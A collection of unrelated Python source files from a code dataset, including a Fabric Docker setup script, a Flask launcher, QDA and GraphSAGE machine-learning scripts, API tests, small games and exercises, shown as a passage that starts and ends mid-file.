--recv-keys 58118E89F3A912897C070ADBF76221572C52609D')\n with settings(warn_only=True):\n sudo('rm {docker_source_list_path}'.format(docker_source_list_path=docker_source_list_path))\n sudo(\"echo 'deb https://apt.dockerproject.org/repo ubuntu-trusty main' > {docker_source_list_path}\".format(docker_source_list_path=docker_source_list_path))\n sudo('apt-get update')\n sudo('sudo apt-get purge lxc-docker')\n sudo('apt-cache policy docker-engine')\n sudo('apt-get --assume-yes install linux-image-extra-$(uname -r)')\n sudo('apt-get --assume-yes install apparmor')\n # turn off firewall\n # TODO: replace this with commands to open fw ports\n sudo('ufw disable')\n sudo('sudo reboot')\n\ndef _install_docker_ubuntu(hostname=''):\n # the initial install\n sudo('sudo apt-get --assume-yes install docker-engine')\n with settings(warn_only=True):\n sudo('sudo service docker stop')\n\n # and configure the service for TLS\n docker_service_config_file = '/etc/default/docker'\n docker_opts = 'DOCKER_OPTS=~--dns 8.8.8.8 --dns 8.8.4.4 --tls=true --tlscacert=/etc/docker/certs.d/{hostname}/ca.pem --tlscert=/etc/docker/certs.d/{hostname}/server-cert.pem --tlskey=/etc/docker/certs.d/{hostname}/server-key.pem -H=0.0.0.0:2376~'.format(hostname=hostname)\n with settings(warn_only=True):\n sudo('echo \"{docker_opts}\" > {docker_service_config_file}'.format(\n docker_service_config_file=docker_service_config_file,\n docker_opts=docker_opts))\n # the positional arguments for this are file, search, replace\n files.sed(docker_service_config_file, '~', '\"', use_sudo=True, backup='.grosgrain_bak')\n\ndef _create_time_stamp():\n now = datetime.now()\n return now.strftime(\"%Y_%m_%d_%H_%M_%S\")\n\ndef _create_working_dir(time_stamp=_create_time_stamp()):\n\n working_dir = 'docker_certs_working_%(time_stamp)s' % { \"time_stamp\": time_stamp }\n\n run('mkdir %(working_dir)s' % { \"working_dir\": working_dir })\n\n return working_dir\n\ndef _create_client_hostname_dir(install_dir, hostname):\n\n local('mkdir {install_dir}/{hostname}'.format(install_dir=install_dir, hostname=hostname))\n","sub_path":"grosgrain/fabfile/docker/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"390807907","text":"'''\nThis file is the gevent launcher for local / development use.\n\nSimply run it on the command line:\npython ycdl_flask_dev.py [port]\n'''\nimport gevent.monkey; gevent.monkey.patch_all()\n\nimport logging\nhandler = logging.StreamHandler()\nlog_format = '{levelname}:ycdl.{module}.{funcName}: {message}'\nhandler.setFormatter(logging.Formatter(log_format, style='{'))\nlogging.getLogger().addHandler(handler)\n\nimport argparse\nimport gevent.pywsgi\nimport sys\n\nfrom voussoirkit import pathclass\nfrom voussoirkit import vlogging\n\nimport bot\nimport ycdl\n\nimport backend\n\n####################################################################################################\n\nsite = backend.site\n\nHTTPS_DIR = pathclass.Path(__file__).parent.with_child('https')\nLOG_LEVEL = vlogging.NOTSET\n\ndef ycdl_flask_launch(\n *,\n create,\n localhost_only,\n port,\n refresh_rate,\n use_https,\n ):\n if use_https is None:\n use_https = port == 443\n\n if use_https:\n http = gevent.pywsgi.WSGIServer(\n listener=('0.0.0.0', port),\n application=site,\n keyfile=HTTPS_DIR.with_child('ycdl.key').absolute_path,\n certfile=HTTPS_DIR.with_child('ycdl.crt').absolute_path,\n )\n else:\n http = gevent.pywsgi.WSGIServer(\n listener=('0.0.0.0', port),\n application=site,\n )\n\n if localhost_only:\n site.localhost_only = True\n\n youtube_core = ycdl.ytapi.Youtube(bot.get_youtube_key())\n backend.common.init_ycdldb(youtube_core, create=create, log_level=LOG_LEVEL)\n ycdl.ytrss.log.setLevel(LOG_LEVEL)\n\n if refresh_rate is not None:\n backend.common.start_refresher_thread(refresh_rate)\n\n message = f'Starting server on port {port}'\n if use_https:\n message += ' (https)'\n print(message)\n\n try:\n http.serve_forever()\n except KeyboardInterrupt:\n pass\n\ndef ycdl_flask_launch_argparse(args):\n return ycdl_flask_launch(\n create=args.create,\n localhost_only=args.localhost_only,\n port=args.port,\n refresh_rate=args.refresh_rate,\n use_https=args.use_https,\n )\n\ndef main(argv):\n global LOG_LEVEL\n (LOG_LEVEL, argv) = vlogging.get_level_by_argv(argv)\n\n parser = argparse.ArgumentParser(description=__doc__)\n\n parser.add_argument('port', nargs='?', type=int, default=5000)\n parser.add_argument('--dont_create', '--dont-create', '--no-create', dest='create', action='store_false', default=True)\n parser.add_argument('--https', dest='use_https', action='store_true', default=None)\n parser.add_argument('--localhost_only', '--localhost-only', dest='localhost_only', action='store_true')\n parser.add_argument('--refresh_rate', '--refresh-rate', dest='refresh_rate', type=int, default=None)\n parser.set_defaults(func=ycdl_flask_launch_argparse)\n\n args = parser.parse_args(argv)\n return args.func(args)\n\nif __name__ == '__main__':\n raise SystemExit(main(sys.argv[1:]))\n","sub_path":"frontends/ycdl_flask/ycdl_flask_dev.py","file_name":"ycdl_flask_dev.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"274051853","text":"#!/usr/bin/env python2.7\n\nfrom one import *\n\n# Ex 3.1\n\ndef compute_qda(trainingy, trainingx):\n def estimate_normal(features):\n mean = np.mean(features, axis=0)\n cov = np.cov(features, rowvar=0)\n return (mean, cov)\n \n x0 = trainingx[trainingy == 0]\n x1 = trainingx[trainingy == 1]\n\n assert trainingx.size == x0.size + x1.size\n\n (mu0, covmat0) = estimate_normal(x0)\n (mu1, covmat1) = estimate_normal(x1)\n\n p0 = x0.size / float(trainingx.size)\n p1 = x1.size / float(trainingx.size)\n\n return (mu0, mu1, covmat0, covmat1, p0, p1)\n\n\n# Ex 3.2\n\nfrom scipy.stats import multivariate_normal\n\ndef perform_qda(mu0, mu1, covmat0, covmat1, p0, p1, testx):\n dist0 = multivariate_normal(mean=mu0, cov=covmat0)\n dist1 = multivariate_normal(mean=mu1, cov=covmat1)\n\n result = np.zeros(testx.shape[0], dtype=np.int)\n\n for i in xrange(0, len(result)):\n x = testx[i]\n x0_prob = p0 * dist0.pdf(x)\n x1_prob = p1 * dist1.pdf(x)\n if x0_prob > x1_prob:\n result[i] = 0\n else:\n result[i] = 1\n\n return result\n\n# bind the first six parameters in perform_qda\ndef qda_classifier(m0, m1, covmat0, covmat1, p0, p1):\n return lambda testx: perform_qda(m0, m1, covmat0, covmat1, p0, p1, testx)\n\n# Ex 3.3 + 3.4\n\n# Misclassifications on training data using QDA stems from modelling error and inherent randomness:\n# QDA assumes normally distributed data.\n# As is the case when using linear regression on a nonlinear sequence of observations, QDA may yield bad results because the modelled phenomenon may be a different kind of random variable, e.g. one with an exponential distribution.\n# In contrast to NN, QDA accounts for some randomness in the approximated function, i.e. X \\mapsto Y may be not deterministic.\n# Whereas NN overfits in these cases, the QDA model assumes that some very unlikely observations are in the training data.\n# For example, consider a training instance (X_i, Y_i) whose feature X_i is very close to the features of training instances with a common different label Z.\n# In that case, the observation (X_i, Y_i) may be extremely unlikely, because the (X_i, Z) may be much more common.\n# NN fails in these cases, whereas QDA correctly (in most cases) assigns the label Z to observation X_i.\n# This also means that when QDA is used on the training data, it will sometimes yield wrong results if the observation is sufficiently 'unlikely'.\n\n\n# apply classifier on testx and show results in figure\n# the classifiers results are compared to testy in the figure\ndef visualizeClassification(classifier, testy, testx, show_correctness=True):\n plt.gca().set_position((.1, .3, .8, .6)) # to make a bit of room for extra text\n\n plt.xlabel('absolute value norm')\n plt.ylabel('euclidean norm')\n\n estimatedy = classifier(testx)\n\n correct_classification_rate = float(len(estimatedy[estimatedy == testy])) / len(testy) \n\n colors = np.where(testy == estimatedy, \"b\", \"r\")\n\n x0 = testx[estimatedy == 0][ : , 0]\n y0 = testx[estimatedy == 0][ : , 1]\n c0 = colors[estimatedy == 0]\n\n x1 = testx[estimatedy == 1][ : , 0]\n y1 = testx[estimatedy == 1][ : , 1]\n c1 = colors[estimatedy == 1]\n\n size = 20\n\n plt.scatter(x0, y0, marker=\"o\", c=c0, s=size)\n plt.scatter(x1, y1, marker=\"x\", c=c1, s=size)\n\n plt.figtext(0.02, 0.02, \n '''\n o: Classified as 1\n x: Classified as 7\n ''')\n\n if show_correctness:\n plt.figtext(0.7, 0.02, \n '''\n Correct Classification Rate: %.2f\n Blue: Correct Classification\n Red: Wrong Classification\n ''' % correct_classification_rate)\n\n plt.show()\n\ndef makeGridValues(absmax, euclidmax):\n absvals = (absmax / 100) * np.array(xrange(0, 100))\n euclidvals = (euclidmax / 100) * np.array(xrange(0, 100))\n\n return np.array([[absval, euclidval] for euclidval in euclidvals for absval in absvals])\n\nif __name__ == \"__main__\":\n mu0, mu1, covmat0, covmat1, p0, p1 = compute_qda(Y_train, X_train)\n\n classifier = qda_classifier(mu0, mu1, covmat0, covmat1, p0, p1)\n plt.title('Classification Results on Training Data')\n visualizeClassification(classifier, Y_train, X_train)\n plt.clf()\n\n absmax = np.max(X_train[ : , 0])\n euclidmax = np.max(X_train[ : , 1])\n\n grid_values = makeGridValues(absmax, euclidmax)\n\n plt.title('Decision Regions')\n # choose classifier(grid_values) as 'correct' Y so every classification is painted blue\n visualizeClassification(classifier, classifier(grid_values), grid_values, show_correctness=False)\n plt.clf()\n\n # Ex 3.5\n plt.title('Classification Results on Test Data')\n visualizeClassification(classifier, Y_test, X_test)\n plt.clf()\n","sub_path":"blatt03/corrected-lda/three.py","file_name":"three.py","file_ext":"py","file_size_in_byte":4795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"365693513","text":"import datetime\n\nimport trainer.corpora as crp\nimport trainer.features as ftr\nimport trainer.classifier_test as cls\nimport os\n\n# vars\ntype = \"inf-20k\"\nnltk_run = True\nsklearn_run = False\nCOUNT = 20000\ncut = int((COUNT / 2) * 3 / 4)\narray = [5000, 10000, 15000, 20000, 25000, 30000, 150000]\n\ndef run(dataset):\n\n nlt = dict()\n skl = dict()\n\n dir = \"output/\" + dataset + \"/\" + type + \"/\"\n os.makedirs(dir, exist_ok=True)\n\n # file\n for variable in array:\n var_name = str(variable)\n\n if nltk_run:\n nlt_file = dir + dataset + \"-\" + type + \"-\" + var_name + \"-nlt.csv\"\n nlt[var_name] = open(nlt_file, 'a')\n nlt[var_name].write(str(datetime.datetime.today()) + \"\\n\")\n\n if sklearn_run:\n skl_file = dir + dataset + \"-\" + type + \"-\" + var_name + \"-skl.csv\"\n skl[var_name] = open(skl_file, 'a')\n skl[var_name].write(str(datetime.datetime.today()) + \"\\n\")\n\n # cycle\n for x in range(0, 10):\n print(x)\n corpora = crp.Corpora(dataset, count=COUNT, shuffle=True)\n\n for variable in array:\n print(str(variable))\n var_name = str(variable)\n features = ftr.Features(corpora, total=COUNT, bigram=True, stop=False, stem=\"porter\", lower=True, inf_count=variable)\n\n posfeats = features.get_features_pos()\n negfeats = features.get_fearures_neg()\n\n trainfeats = negfeats[:cut] + posfeats[:cut]\n testfeats = negfeats[cut:] + posfeats[cut:]\n\n nlt_output, skl_output = cls.train(trainfeats, testfeats, nlt=nltk_run, skl=sklearn_run)\n\n if nltk_run:\n print(str(nlt_output))\n nlt[var_name].write(nlt_output)\n nlt[var_name].flush()\n if sklearn_run:\n print(str(skl_output))\n skl[var_name].write(skl_output)\n skl[var_name].flush()\n\n\n\ndataset_array = [\"stanford\"]\n\nfor dataset in dataset_array:\n run(dataset)","sub_path":"trainer/tests/inf.py","file_name":"inf.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"620295435","text":"import time\nimport torch\nimport numpy as np\nfrom Losses import *\nfrom ObjectModel import ObjectModel\nfrom CodeUtil import *\n\ncode, idx = get_obj_code_random(1)\nobj_model = ObjectModel()\nfc_loss = FCLoss(obj_model)\n\nn_cps = [3,5,10,20,100,1000]\ntimes = []\n\nfor n_cp in n_cps:\n pts = torch.rand([10000, 1, n_cp, 3], device='cuda', requires_grad=True)\n t = []\n p = pts[0]\n dist = obj_model.distance(code, p)\n grad = obj_model.gradient(p, dist, retain_graph=True, allow_unused=True)\n loss = fc_loss.fc_loss(pts[0], grad, code)\n for i in range(len(pts)):\n p = pts[i]\n t0 = time.time()\n dist = obj_model.distance(code, p)\n grad = obj_model.gradient(p, dist, retain_graph=True, allow_unused=True)\n loss = fc_loss.fc_loss(pts[i], grad, code)\n t.append(time.time() - t0)\n times.append(np.mean(t))\n print(n_cp, np.mean(t))\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nmatplotlib.rc('xtick', labelsize=15) \nmatplotlib.rc('ytick', labelsize=15) \n\n_ = plt.plot(n_cps,times,linewidth=3, markersize=10)\n_ = plt.xlabel('# Contact Points', fontsize=20)\n_ = plt.ylabel('Time per 1000 FC Calls (s)', fontsize=20)\n_ = plt.xscale('log')\n_ = plt.show()\n","sub_path":"ForceClosure/fig_force_closure_time.py","file_name":"fig_force_closure_time.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"43923455","text":"# least unique -> most unique\n\nimport numpy as np\n\nlambda_lya_min = 1045\nlambda_lya_max = 1185\nlambda_lya = 1215.67\nc_kms = 2.99792458e5\n\nlambda_lyb_min = 978\nlambda_lyb_max = 1014\nlambda_lyb = 1025.7\n\nzmin = 3.0\nzmax = 4.4\ndz = 0.2\nzbinlen = int((zmax-zmin)/dz+0.5) #reduced_zbinlen = int(((zmax-zmin)/dz+1)-1)\nzmin_bin = 0.0\nzmax_bin = 5.0\n\nkmin = 0 #3e-3 #0.0\nkmax = 0.06 #- 3e-3#0.06 #0.06\ndlogk = 3e-3\nkbinlen = int((kmax - kmin)/dlogk + 0.5) #reduced_kbinlen = int(((kmax-kmin)/dlogk+1)-1)\nlog_binning = 0\n\ndloglambda = 3e-5\ndv = c_kms * dloglambda * np.log(10)\n\nDLAcat_file = \"../Data/XQ-100_DLA_catalogue.txt\"\ncatalog = \"../Data/XQ-100_catalogue.txt\"\nnqso = 100\nmin_pix = 100\nmin_flux = -1e-15\nmin_trans = -100","sub_path":"demonstration/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"49829135","text":"import os.path as osp\n\nimport argparse\nimport numpy as np\nimport time\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn import Parameter\nfrom torch_sparse import SparseTensor\nfrom torch_geometric.datasets import Reddit\nfrom torch_geometric.nn.inits import glorot, zeros\n\nfrom utils import Logger\n\nclass SAGEConv(nn.Module):\n def __init__(self,\n in_feats,\n out_feats,\n aggr,\n feat_drop=0.,\n activation=None):\n super(SAGEConv, self).__init__()\n\n self._in_feats = in_feats\n self._out_feats = out_feats\n self._aggr = aggr\n self.feat_drop = nn.Dropout(feat_drop)\n self.activation = activation\n\n self.weight = Parameter(torch.Tensor(in_feats, out_feats))\n self.root_weight = Parameter(torch.Tensor(in_feats, out_feats))\n self.bias = Parameter(torch.Tensor(out_feats))\n\n self.reset_parameters()\n\n def reset_parameters(self):\n glorot(self.weight)\n glorot(self.root_weight)\n zeros(self.bias)\n\n def forward(self, x, adj):\n x = self.feat_drop(x)\n if self._aggr == 'sum':\n out = adj.matmul(x) @ self.weight\n elif self._aggr == 'mean':\n out = adj.matmul(x, reduce=\"mean\") @ self.weight\n else:\n return ValueError(\"Expect aggregation to be 'sum' or 'mean', got {}\".format(self._aggr))\n out = out + x @ self.root_weight + self.bias\n if self.activation is not None:\n out = self.activation(out)\n return out\n\nclass GraphSAGE(nn.Module):\n def __init__(self,\n in_feats,\n n_hidden,\n n_classes,\n aggr,\n activation=F.relu,\n dropout=0.):\n super(GraphSAGE, self).__init__()\n self.layers = nn.ModuleList()\n self.layers.append(SAGEConv(in_feats, n_hidden, aggr, activation=activation))\n self.layers.append(SAGEConv(n_hidden, n_classes, aggr, feat_drop=dropout, activation=None))\n\n def reset_parameters(self):\n for layer in self.layers:\n layer.reset_parameters()\n\n def forward(self, x, edge_index):\n h = x\n for layer in self.layers:\n h = layer(h, edge_index)\n return h\n\ndef calc_acc(logits, labels, mask):\n logits = logits[mask]\n labels = labels[mask]\n _, indices = torch.max(logits, dim=1)\n correct = torch.sum(indices == labels)\n return correct.item() * 1.0 / len(labels)\n\ndef evaluate(model, features, adj, labels, train_mask, val_mask, test_mask):\n model.eval()\n with torch.no_grad():\n logits = model(features, adj)\n train_acc = calc_acc(logits, labels, train_mask)\n val_acc = calc_acc(logits, labels, val_mask)\n test_acc = calc_acc(logits, labels, test_mask)\n return train_acc, val_acc, test_acc\n\ndef main(args):\n device = f'cuda:{args.device}' if torch.cuda.is_available() else 'cpu'\n device = torch.device(device)\n\n path = osp.join('dataset', 'Reddit')\n dataset = Reddit(path)\n data = dataset[0]\n\n features = data.x.to(device)\n labels = data.y.to(device)\n edge_index = data.edge_index.to(device)\n adj = SparseTensor(row=edge_index[0], col=edge_index[1])\n train_mask = torch.BoolTensor(data.train_mask).to(device)\n val_mask = torch.BoolTensor(data.val_mask).to(device)\n test_mask = torch.BoolTensor(data.test_mask).to(device)\n\n model = GraphSAGE(dataset.num_features,\n args.n_hidden,\n dataset.num_classes,\n args.aggr,\n F.relu,\n args.dropout).to(device)\n\n loss_fcn = nn.CrossEntropyLoss()\n\n logger = Logger(args.runs, args)\n dur = []\n for run in range(args.runs):\n model.reset_parameters()\n optimizer = torch.optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.weight_decay)\n for epoch in range(1, args.epochs + 1):\n model.train()\n if epoch >= 3:\n t0 = time.time()\n # forward\n logits = model(features, adj)\n loss = loss_fcn(logits[train_mask], labels[train_mask])\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if epoch >= 3:\n dur.append(time.time() - t0)\n print('Training time/epoch {}'.format(np.mean(dur)))\n\n if not args.eval:\n continue\n\n train_acc, val_acc, test_acc = evaluate(model, features, adj, labels, train_mask, val_mask, test_mask)\n logger.add_result(run, (train_acc, val_acc, test_acc))\n\n print(\"Run {:02d} | Epoch {:05d} | Loss {:.4f} | Train {:.4f} | Val {:.4f} | Test {:.4f}\".format(run, epoch, loss.item(), train_acc, val_acc, test_acc))\n\n if args.eval:\n logger.print_statistics(run)\n\n if args.eval:\n logger.print_statistics()\n\n\n \nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='GraphSAGE')\n parser.add_argument(\"--device\", type=int, default=0)\n parser.add_argument(\"--dropout\", type=float, default=0.5,\n help=\"dropout probability\")\n parser.add_argument(\"--lr\", type=float, default=1e-2,\n help=\"learning rate\")\n parser.add_argument(\"--epochs\", type=int, default=200,\n help=\"number of training epochs\")\n parser.add_argument(\"--n-hidden\", type=int, default=16,\n help=\"number of hidden gcn units\")\n parser.add_argument(\"--aggr\", type=str, choices=['sum', 'mean'], default='mean',\n help='Aggregation for messages')\n parser.add_argument(\"--weight-decay\", type=float, default=5e-4,\n help=\"Weight for L2 loss\")\n parser.add_argument(\"--eval\", action='store_true',\n help='If not set, we will only do the training part.')\n parser.add_argument(\"--runs\", type=int, default=10)\n args = parser.parse_args()\n print(args)\n\n main(args)\n","sub_path":"end_to_end/full_graph/node_classification/main_pyg_reddit_sage.py","file_name":"main_pyg_reddit_sage.py","file_ext":"py","file_size_in_byte":6124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"573821394","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 25 21:27:41 2020\n\n@author: loris\n\nDesenvolva um programa que faça a tabuada de um número qualquer inteiro que será digitado pelo \nusuário, mas a tabuada não deve necessariamente iniciar em 1 e terminar em 10, o valor inicial e \nfinal devem ser informados também pelo usuário, conforme exemplo abaixo:\n \n \nMontar a tabuada de: 5\nComeçar por: 4\nTerminar em: 7\n\nVou montar a tabuada de 5 começando em 4 e terminando em 7:\n5 X 4 = 20\n5 X 5 = 25\n5 X 6 = 30\n5 X 7 = 35\n\n\nObs: Você deve verificar se o usuário não digitou o final menor que o inicial.\n\n\"\"\"\n\n\nprint(\"Tabuada do seu jeito!\")\n\nvalidado = False\n\nwhile validado == False: \n tabuada = int(input(\"Mostrar tabuada de: \"))\n comeco = int(input(\"Começar de: \"))\n fim = int(input(\"Terminar em: \"))\n if comeco < fim and comeco != fim:\n validado = True\n\nfor n in range(comeco, fim+1):\n print(str(tabuada)+\" x \"+str(n)+\" = \"+str(tabuada*n))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"3 - Estrutura de Repetição/36.py","file_name":"36.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"497279417","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Message',\n fields=[\n ('id', models.AutoField(auto_created=True, serialize=False, primary_key=True, verbose_name='ID')),\n ('title', models.CharField(max_length=100)),\n ('date', models.DateField(null=True, blank=True)),\n ('text', models.TextField(max_length=3000)),\n ],\n ),\n ]\n","sub_path":"blogblog/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"583885657","text":"from urllib.parse import quote\r\nfrom requests import Session\r\nfrom uuid import uuid4\r\nimport sys\r\n\r\n# Modify\r\n\r\nIDENTIFIER = 'bot_id'\r\nAUTHORIZATION = 'bot_key'\r\n\r\n# Do not modify\r\n\r\nCOMMANDS_URL = 'https://http.msging.net/commands'\r\nSET_METHOD = 'set'\r\n\r\nERROR_ATTENDANTS = []\r\n\r\nif len(sys.argv) < 2:\r\n print('uso: python add_attendants.py ')\r\n exit(-1)\r\n\r\nattendants_csv = open(sys.argv[1], 'r', encoding='utf8')\r\n\r\ncsv_data = None\r\n\r\ntry:\r\n csv_data = attendants_csv.read().split('\\n')[1:]\r\n attendants_csv.close()\r\nexcept Exception as ex:\r\n print('Error while parsing csv')\r\n attendants_csv.close()\r\n exit(-1)\r\n\r\n\r\ndef create_set_attendant_command(email, teams):\r\n return {\r\n 'id': str(uuid4()),\r\n 'to': 'postmaster@desk.msging.net',\r\n 'method': SET_METHOD,\r\n 'uri': '/attendants',\r\n 'type': 'application/vnd.iris.desk.attendant+json',\r\n 'resource': {\r\n 'identity': f'{quote(email)}@blip.ai',\r\n 'teams': teams\r\n }\r\n }\r\n\r\n\r\ndef get_email_teams_from_line(line):\r\n splited_line = line.split(',')\r\n email = splited_line[0]\r\n teams = splited_line[1:]\r\n return email, teams\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(f'Starting session for {IDENTIFIER}')\r\n session = Session()\r\n session.headers = {\r\n 'Authorization': AUTHORIZATION\r\n }\r\n print(f'Found {len(csv_data)} attendants')\r\n for attendant in csv_data:\r\n email, teams = get_email_teams_from_line(attendant)\r\n command_body = create_set_attendant_command(email, teams)\r\n\r\n command_res = session.post(COMMANDS_URL, json=command_body)\r\n command_res = command_res.json()\r\n\r\n if command_res['status'] != 'success':\r\n print(f'Error adding {email}')\r\n ERROR_ATTENDANTS.append(attendant)\r\n else:\r\n print(f'Added {email}')\r\n if len(ERROR_ATTENDANTS) > 0:\r\n print(\r\n f'Saving {len(ERROR_ATTENDANTS)} not added attendants to error_{IDENTIFIER}.csv'\r\n )\r\n with open(f'error_{IDENTIFIER}.csv', 'w', encoding='utf8') as error_file:\r\n error_file.write('\\n'.join(ERROR_ATTENDANTS))\r\n error_file.close()\r\n print('Done')\r\n","sub_path":"add_attendants.py","file_name":"add_attendants.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"344484198","text":" ## - *** GAME *** -\n ##Rock | Paper | Scissors\n\nimport random\nfrom time import sleep\nimport time\n\n# Defined the countdown module:\ndef countdown(n) :\n while n > 0:\n print (n)\n sleep(1)\n n = n - 1\n if n ==0:\n print(\">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>START<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\")\n\n# Assigned 0 as the starting point for the score:\nscore_Player = 0\nscore_Computer = 0\n\n# Introduce the game and ask for the gamer's name as an 'input':\nprint(str(input(\"Hello player :) Welcole to the Rock | Paper | Scissors GAME!!!\\n\\n\\t\\tPress >ENTER< to continue.\")))\nsleep(0.5)\nPlayer_One = str(input(\"Before we start; what shoul I be calling you?\\nEnter the name here: \"))\nsleep(0.4)\nprint(\"Good luck %s. Computer is known to be very lucky at this game!!!\"%(Player_One))\nsleep(1.3)\ncountdown(3)\n\n#Started the game in a while loop:\nwhile True:\n Player_Choice = str(input(\"Choose one: [Rock / Paper / Scissors]\\n(R) for Rock\\t (P) for Paper\\t (S) for Scissors: \"))\n Choice = [\"Rock\", \"Paper\", \"Scissors\"]\n Computer = (random.choice(Choice))\n \n if ((Player_Choice == \"R\" and Computer == \"Rock\") or (Player_Choice == \"P\" and Computer == \"Paper\") or (Player_Choice == \"S\" and Computer == \"Scissors\")):\n print(\"\\nComputer's Cohice: %s\\n\"%(Computer))\n print(\"It's a tie!\")\n sleep(1.6)\n score_Player = score_Player + 1\n score_Computer = score_Computer + 1\n print(\"%s: %d | Computer: %d\"%(Player_One,score_Player,score_Computer))\n \n elif((Player_Choice == \"R\" and Computer == \"Scissors\") or (Player_Choice == \"P\" and Computer == \"Rock\") or (Player_Choice == \"S\" and Computer == \"Paper\")):\n print(\"\\nComputer's Cohice: %s\\n\"%(Computer))\n print(\"%s WINS!!!\"%(Player_One))\n sleep(1.6)\n score_Player = score_Player+ 1\n print(\"%s: %d | Computer: %d\"%(Player_One,score_Player,score_Computer))\n \n else:\n print(\"\\nComputer's Cohice: %s\"%(Computer))\n print(\"Computer WINS!!!\\n\")\n sleep(1.6)\n score_Computer = score_Computer + 1\n print(\"%s: %d | Computer: %d\"%(Player_One,score_Player,score_Computer))\n# When the total score reaches to '5', it ends the game; announces the winner; and asks whether you want to try again:\n total_score = score_Computer + score_Player\n if total_score >= 5:\n sleep(0.5)\n if score_Computer > score_Player:\n print(\"\\nComputer WINS the Round!!!\")\n elif score_Computer == score_Player:\n print(\"\\nIT IS A TIE!!!\")\n else:\n print(\"\\n%s WINS the Round!!!\"%(Player_One))\n willRepeat = str(input(\"Do you want to try again? [Y / N] : \"))\n if willRepeat == \"Y\":\n score_Player = 0\n score_Computer = 0\n sleep(0.4)\n continue\n elif willRepeat == \"N\":\n sleep(0.3)\n break \n \n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"71848217","text":"\"\"\"\nRun Tests on the Categories Endpoint\n\"\"\"\n\nimport logging\n\nfrom lunchable import LunchMoney\nfrom lunchable.models.categories import CategoriesObject\nfrom tests.conftest import lunchable_cassette\n\nlogger = logging.getLogger(__name__)\n\n\n@lunchable_cassette\ndef test_get_categories(lunch_money_obj: LunchMoney):\n \"\"\"\n Get Categories and Assert that they're categories\n \"\"\"\n categories = lunch_money_obj.get_categories()\n assert len(categories) >= 1\n for category in categories:\n assert isinstance(category, CategoriesObject)\n logger.info(\"%s Categories returned\", len(categories))\n\n\n@lunchable_cassette\ndef test_create_category(lunch_money_obj: LunchMoney):\n \"\"\"\n Get Categories and Assert that they're categories\n \"\"\"\n name = \"Test Category\"\n category = lunch_money_obj.insert_category(name=name,\n description=\"Test Category Description\",\n exclude_from_budget=True)\n logger.info(\"Category ID # %s was just created: %s\", category, name)\n assert isinstance(category, int)\n","sub_path":"tests/models/test_categories.py","file_name":"test_categories.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"225670132","text":"import time\nfrom mrq.job import Job\nimport pytest\n\n\n@pytest.mark.parametrize([\"p_service\"], [[\"mongodb\"], [\"redis\"]])\ndef test_disconnects_service_during_task(worker, p_service):\n \"\"\" Test what happens when mongodb disconnects during a job\n \"\"\"\n\n worker.start()\n\n if p_service == \"mongodb\":\n service = worker.fixture_mongodb\n elif p_service == \"redis\":\n service = worker.fixture_redis\n\n service_pid = service.process.pid\n\n job_id1 = worker.send_task(\"tests.tasks.general.Add\", {\n \"a\": 41, \"b\": 1, \"sleep\": 5}, block=False, queue=\"default\")\n\n time.sleep(2)\n\n service.stop()\n service.start()\n\n service_pid2 = service.process.pid\n\n # Make sure we did restart\n assert service_pid != service_pid2\n\n time.sleep(5)\n\n # Result should be there without issues\n assert Job(job_id1).fetch().data[\"result\"] == 42\n","sub_path":"tests/test_disconnects.py","file_name":"test_disconnects.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"59355599","text":"from random import randint\n\ndef main () :\n path = run ()\n\n print (\"The sortest path is : \" , end = '') ;\n\n for city in range (len (path)) :\n if city == (len (path) - 1) :\n print (path [city])\n\n else :\n print (path [city] , \"---> \" , end = '')\n\ndef run () :\n cities = ['A' , 'B' , 'C' , 'D' , 'E' , 'F' , 'G']\n map = createMap ()\n population = startingPopulation (map , cities)\n\n previous = list ()\n condition = True\n\n # The argument of range function is the number of evolution\n # you may change the number of evolution. It's up to you.\n\n for i in range (1000) :\n best_chromosome = findPurposeValue (map , population)\n\n # This \"if\" statement for comparing previous with best chromosome\n # and just execute once.\n\n if condition :\n previous = [i for i in 